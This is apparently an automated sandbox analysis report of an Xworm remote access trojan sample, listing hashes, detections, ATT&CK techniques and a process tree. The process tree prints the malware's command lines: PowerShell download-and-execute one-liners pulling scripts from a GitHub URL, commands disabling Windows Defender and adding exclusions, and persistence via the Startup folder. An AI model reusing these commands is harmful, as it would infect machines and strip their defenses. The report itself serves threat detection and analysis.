xworm | a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2024 02:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
Size

10.5MB
MD5

5b181d2d87aa99c90b3593845a0a3257
SHA1

1d9dbd51f21317c839d9c9058ac1f890e5ca9245
SHA256

a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad
SHA512

7c0a73687eeb7f0917da13b0bc780e95260677349496fcca09ecbd36e2c2acfa61b86bc9cd4c3f1335c89351e384fc63664c8e4323e09b6696e0dcc0927dadc7
SSDEEP

196608:+2E+1M6U3b01Kpn3V+uq+VvpSdQmRJ8dA6lkaycBIGpEGo6hTOv+QKfW8fw:YL01+l+uq+VvUdQuslp9foWOv+9f

Score

10^/10

xworm discovery execution pyinstaller rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1

Extracted

Family

xworm

Version

5.0

Mutex

6lFXjUqCtT3P20q9

Attributes

install_file
wintousb.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4332-152-0x000002A638E90000-0x000002A638EA0000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 26 IoCs

flow	pid	Process
20	1536	powershell.exe
26	1536	powershell.exe
27	4332	powershell.exe
30	1536	powershell.exe
31	4332	powershell.exe
32	4332	powershell.exe
33	4332	powershell.exe
40	4332	powershell.exe
43	1520	powershell.exe
45	2308	powershell.exe
46	2308	powershell.exe
47	2308	powershell.exe
48	4332	powershell.exe
61	4332	powershell.exe
62	4332	powershell.exe
63	4332	powershell.exe
67	4332	powershell.exe
68	4332	powershell.exe
69	4332	powershell.exe
74	4332	powershell.exe
76	4332	powershell.exe
77	4332	powershell.exe
78	4332	powershell.exe
79	4332	powershell.exe
80	4332	powershell.exe
84	4332	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1328	powershell.exe
860	powershell.exe
1424	powershell.exe
5088	powershell.exe
1536	powershell.exe
1520	powershell.exe
4332	powershell.exe
3400	powershell.exe
2308	powershell.exe
2256	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 2 IoCs

pid	Process
3852	Updated.scr
3888	Updated.scr

Loads dropped DLL 44 IoCs

pid	Process
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr
3888	Updated.scr

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
27	raw.githubusercontent.com
33	raw.githubusercontent.com
43	raw.githubusercontent.com
45	raw.githubusercontent.com
18	raw.githubusercontent.com
20	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
4972	tasklist.exe
4856	tasklist.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0010000000023b28-177.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
1536	powershell.exe
1536	powershell.exe
5088	powershell.exe
5088	powershell.exe
2256	powershell.exe
2256	powershell.exe
2256	powershell.exe
5088	powershell.exe
1536	powershell.exe
4332	powershell.exe
4332	powershell.exe
1328	powershell.exe
1328	powershell.exe
860	powershell.exe
860	powershell.exe
4332	powershell.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
3400	powershell.exe
3400	powershell.exe
1424	powershell.exe
1424	powershell.exe
3400	powershell.exe
1424	powershell.exe
1520	powershell.exe
2308	powershell.exe
2308	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	4972	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3400	WMIC.exe
Token: SeSecurityPrivilege	3400	WMIC.exe
Token: SeTakeOwnershipPrivilege	3400	WMIC.exe
Token: SeLoadDriverPrivilege	3400	WMIC.exe
Token: SeSystemProfilePrivilege	3400	WMIC.exe
Token: SeSystemtimePrivilege	3400	WMIC.exe
Token: SeProfSingleProcessPrivilege	3400	WMIC.exe
Token: SeIncBasePriorityPrivilege	3400	WMIC.exe
Token: SeCreatePagefilePrivilege	3400	WMIC.exe
Token: SeBackupPrivilege	3400	WMIC.exe
Token: SeRestorePrivilege	3400	WMIC.exe
Token: SeShutdownPrivilege	3400	WMIC.exe
Token: SeDebugPrivilege	3400	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3400	WMIC.exe
Token: SeRemoteShutdownPrivilege	3400	WMIC.exe
Token: SeUndockPrivilege	3400	WMIC.exe
Token: SeManageVolumePrivilege	3400	WMIC.exe
Token: 33	3400	WMIC.exe
Token: 34	3400	WMIC.exe
Token: 35	3400	WMIC.exe
Token: 36	3400	WMIC.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeIncreaseQuotaPrivilege	3400	WMIC.exe
Token: SeSecurityPrivilege	3400	WMIC.exe
Token: SeTakeOwnershipPrivilege	3400	WMIC.exe
Token: SeLoadDriverPrivilege	3400	WMIC.exe
Token: SeSystemProfilePrivilege	3400	WMIC.exe
Token: SeSystemtimePrivilege	3400	WMIC.exe
Token: SeProfSingleProcessPrivilege	3400	WMIC.exe
Token: SeIncBasePriorityPrivilege	3400	WMIC.exe
Token: SeCreatePagefilePrivilege	3400	WMIC.exe
Token: SeBackupPrivilege	3400	WMIC.exe
Token: SeRestorePrivilege	3400	WMIC.exe
Token: SeShutdownPrivilege	3400	WMIC.exe
Token: SeDebugPrivilege	3400	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3400	WMIC.exe
Token: SeRemoteShutdownPrivilege	3400	WMIC.exe
Token: SeUndockPrivilege	3400	WMIC.exe
Token: SeManageVolumePrivilege	3400	WMIC.exe
Token: 33	3400	WMIC.exe
Token: 34	3400	WMIC.exe
Token: 35	3400	WMIC.exe
Token: 36	3400	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1536	powershell.exe
Token: SeSecurityPrivilege	1536	powershell.exe
Token: SeTakeOwnershipPrivilege	1536	powershell.exe
Token: SeLoadDriverPrivilege	1536	powershell.exe
Token: SeSystemProfilePrivilege	1536	powershell.exe
Token: SeSystemtimePrivilege	1536	powershell.exe
Token: SeProfSingleProcessPrivilege	1536	powershell.exe
Token: SeIncBasePriorityPrivilege	1536	powershell.exe
Token: SeCreatePagefilePrivilege	1536	powershell.exe
Token: SeBackupPrivilege	1536	powershell.exe
Token: SeRestorePrivilege	1536	powershell.exe
Token: SeShutdownPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeSystemEnvironmentPrivilege	1536	powershell.exe
Token: SeRemoteShutdownPrivilege	1536	powershell.exe
Token: SeUndockPrivilege	1536	powershell.exe
Token: SeManageVolumePrivilege	1536	powershell.exe
Token: 33	1536	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4332	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2132 wrote to memory of 224	2132	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe	85
PID 2132 wrote to memory of 224	2132	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe	85
PID 224 wrote to memory of 4288	224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe	87
PID 224 wrote to memory of 4288	224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe	87
PID 4288 wrote to memory of 2284	4288	cmd.exe	89
PID 4288 wrote to memory of 2284	4288	cmd.exe	89
PID 2284 wrote to memory of 1536	2284	mshta.exe	90
PID 2284 wrote to memory of 1536	2284	mshta.exe	90
PID 224 wrote to memory of 3512	224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe	92
PID 224 wrote to memory of 3512	224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe	92
PID 224 wrote to memory of 2704	224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe	93
PID 224 wrote to memory of 2704	224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe	93
PID 224 wrote to memory of 960	224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe	94
PID 224 wrote to memory of 960	224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe	94
PID 224 wrote to memory of 3348	224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe	98
PID 224 wrote to memory of 3348	224	a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe	98
PID 960 wrote to memory of 4972	960	cmd.exe	100
PID 960 wrote to memory of 4972	960	cmd.exe	100
PID 3512 wrote to memory of 5088	3512	cmd.exe	101
PID 3512 wrote to memory of 5088	3512	cmd.exe	101
PID 3348 wrote to memory of 3400	3348	cmd.exe	102
PID 3348 wrote to memory of 3400	3348	cmd.exe	102
PID 2704 wrote to memory of 2256	2704	cmd.exe	103
PID 2704 wrote to memory of 2256	2704	cmd.exe	103
PID 1536 wrote to memory of 1512	1536	powershell.exe	105
PID 1536 wrote to memory of 1512	1536	powershell.exe	105
PID 1512 wrote to memory of 3980	1512	csc.exe	106
PID 1512 wrote to memory of 3980	1512	csc.exe	106
PID 1536 wrote to memory of 4564	1536	powershell.exe	109
PID 1536 wrote to memory of 4564	1536	powershell.exe	109
PID 1536 wrote to memory of 4332	1536	powershell.exe	110
PID 1536 wrote to memory of 4332	1536	powershell.exe	110
PID 4332 wrote to memory of 1328	4332	powershell.exe	117
PID 4332 wrote to memory of 1328	4332	powershell.exe	117
PID 4332 wrote to memory of 860	4332	powershell.exe	119
PID 4332 wrote to memory of 860	4332	powershell.exe	119
PID 1536 wrote to memory of 3852	1536	powershell.exe	124
PID 1536 wrote to memory of 3852	1536	powershell.exe	124
PID 3852 wrote to memory of 3888	3852	Updated.scr	125
PID 3852 wrote to memory of 3888	3852	Updated.scr	125
PID 3888 wrote to memory of 3932	3888	Updated.scr	126
PID 3888 wrote to memory of 3932	3888	Updated.scr	126
PID 3932 wrote to memory of 5044	3932	cmd.exe	129
PID 3932 wrote to memory of 5044	3932	cmd.exe	129
PID 5044 wrote to memory of 1520	5044	mshta.exe	130
PID 5044 wrote to memory of 1520	5044	mshta.exe	130
PID 3888 wrote to memory of 4572	3888	Updated.scr	132
PID 3888 wrote to memory of 4572	3888	Updated.scr	132
PID 3888 wrote to memory of 3188	3888	Updated.scr	133
PID 3888 wrote to memory of 3188	3888	Updated.scr	133
PID 3888 wrote to memory of 4152	3888	Updated.scr	134
PID 3888 wrote to memory of 4152	3888	Updated.scr	134
PID 3888 wrote to memory of 4660	3888	Updated.scr	138
PID 3888 wrote to memory of 4660	3888	Updated.scr	138
PID 3188 wrote to memory of 3400	3188	cmd.exe	140
PID 3188 wrote to memory of 3400	3188	cmd.exe	140
PID 4660 wrote to memory of 3876	4660	cmd.exe	141
PID 4660 wrote to memory of 3876	4660	cmd.exe	141
PID 4572 wrote to memory of 1424	4572	cmd.exe	142
PID 4572 wrote to memory of 1424	4572	cmd.exe	142
PID 4152 wrote to memory of 4856	4152	cmd.exe	143
PID 4152 wrote to memory of 4856	4152	cmd.exe	143
PID 1520 wrote to memory of 3916	1520	powershell.exe	145
PID 1520 wrote to memory of 3916	1520	powershell.exe	145

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4564	attrib.exe
4760	attrib.exe

C:\Users\Admin\AppData\Local\Temp\a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
"C:\Users\Admin\AppData\Local\Temp\a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2132
- C:\Users\Admin\AppData\Local\Temp\a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
  "C:\Users\Admin\AppData\Local\Temp\a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close)
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4288
  - - C:\Windows\system32\mshta.exe
      mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close)
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:2284
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1536
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pq5xxsmg\pq5xxsmg.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1512
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA846.tmp" "c:\Users\Admin\AppData\Local\Temp\pq5xxsmg\CSCFBF6CBE18C164717B47456199D8B9D2.TMP"
        7⤵
        
        PID:3980
      - C:\Windows\system32\attrib.exe
        
        "C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}
        6⤵
        Views/modifies file attributes
        
        PID:4564
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1'))
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:860
      - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr
        
        "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr" /S
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3852
        
        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr
        
        "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr" /S
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:3888
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close)
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3932
        
        C:\Windows\system32\mshta.exe
        
        mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close)
        9⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:5044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex"
        10⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1520
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jdywrfel\jdywrfel.cmdline"
        11⤵
        
        PID:3916
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF85A.tmp" "c:\Users\Admin\AppData\Local\Temp\jdywrfel\CSCCD015CEE8F8849D68532C98FF5823C2.TMP"
        12⤵
        
        PID:3716
        
        C:\Windows\system32\attrib.exe
        
        "C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}
        11⤵
        Views/modifies file attributes
        
        PID:4760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1'))
        11⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2308
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr'"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4152
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        
        PID:4856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4660
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        9⤵
        
        PID:3876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:960
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3348
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr

Filesize
10.5MB

MD5
5b181d2d87aa99c90b3593845a0a3257

SHA1
1d9dbd51f21317c839d9c9058ac1f890e5ca9245

SHA256
a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad

SHA512
7c0a73687eeb7f0917da13b0bc780e95260677349496fcca09ecbd36e2c2acfa61b86bc9cd4c3f1335c89351e384fc63664c8e4323e09b6696e0dcc0927dadc7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9a2c763c5ff40e18e49ad63c7c3b0088

SHA1
4b289ea34755323fa869da6ad6480d8d12385a36

SHA256
517807921c55bd16cd8a8bfae3d5dc19444c66f836b66acd5593e3080acbaf8e

SHA512
3af01926bc7de92076067d158d7250b206d396b3282ee0db43639d04d91bd9ff763acbce12c7822914824984a3c5fdd1b8dbf1ad2ee88233d47f0f808b746bc8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7379b068222b3ff176d2ff342b4b02eb

SHA1
30af8c768dd6305da05b35ab7e5b21b7456da30b

SHA256
4e48cad755951c0a96cee0a3a9846617a197f3b8918bf6cad440a12b33326bd7

SHA512
7ec193e37482324ca61fa3868380c7a9abce3fe02517caeaec59c2ab1484bf7455f7c61d319ab8342117d07301c64e132bfb63aa694fc0ba2d961678b1f0a2f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA846.tmp

Filesize
1KB

MD5
b5dc8578d7975efa5ae19b9ee9907624

SHA1
5830c86c1aafd3ab338542d4e9f2ea035d7b4412

SHA256
8ee9348e1d6d3965fc0bf39ee3c53f965dbff5cd9ffe9085dfc75c42dc650a32

SHA512
